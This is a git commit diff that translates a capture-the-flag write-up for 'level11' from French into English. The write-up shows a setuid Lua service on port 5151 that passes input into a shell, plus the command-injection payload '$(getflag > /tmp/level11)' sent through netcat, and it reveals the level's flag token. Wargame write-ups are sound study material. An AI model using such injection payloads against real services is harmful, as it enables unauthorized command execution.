docs(lvl11): adding the english readme
This commit is contained in:
parent
b8eac83370
commit
6a7970c245
1 changed files with 8 additions and 9 deletions
|
|
@ -1,4 +1,4 @@
|
|||
Lors de mon arriver sur le level 11 je remarque un fichier lua lisble
|
||||
When arriving on level11 I notice a readable lua file.
|
||||
|
||||
```bash
|
||||
ls -l
|
||||
|
|
@ -6,7 +6,7 @@ total 4
|
|||
-rwsr-sr-x 1 flag11 level11 668 Mar 5 2016 level11.lua
|
||||
```
|
||||
|
||||
Je l'ouvre pour regarder le contenue
|
||||
I open it to look at the content.
|
||||
```lua
|
||||
#!/usr/bin/env lua
|
||||
local socket = require("socket")
|
||||
|
|
@ -44,19 +44,19 @@ while 1 do
|
|||
end
|
||||
```
|
||||
|
||||
Le hash a ete decode via [CrashStation](https://crackstation.net/) et donne en sha1 NotSoEasy
|
||||
Ce n'est donc pas la reponse mais il fallait bien tenter
|
||||
The hash was decoded via [CrashStation](https://crackstation.net/) and gives in sha1 NotSoEasy.
|
||||
This is therefore not the answer but it was necessary to try.
|
||||
|
||||
Lors de la lecture du script nous pouvons voir que le port 5151 est ouvert et donc nous pouvons essayer de le lancer avec un netcat en ecoute de ce dernier
|
||||
During the reading of the script we can see that port 5151 is open and we can therefore try to launch it with a netcat listening on it.
|
||||
|
||||
Lorsqu'il est en ecoute il demande un password
|
||||
When it is listening it asks for a password.
|
||||
```bash
|
||||
nc localhost 5151
|
||||
Password:
|
||||
```
|
||||
|
||||
mais le hash est calculer en effectuant une commande `echo $args | sha1sum` (traduit en shell)
|
||||
nous pouvons donc executer une commande sur cette derniere mais le resultat ne nous sera pas afficher car pas envoyer au client mais nous pouvons la lancer directement pour rediriger dans un fichier
|
||||
But the hash is calculated by executing a command `echo $args | sha1sum` (translated in shell).
|
||||
We can therefore execute a command on this one but the result will not be displayed to us because not sent to the client, but we can launch it directly to redirect into a file.
|
||||
```bash
|
||||
nc localhost 5151
|
||||
Password: $(getflag > /tmp/level11)
|
||||
|
|
@ -65,4 +65,3 @@ Erf nope...
|
|||
cat /tmp/level11
|
||||
Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
|
||||
```
|
||||
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue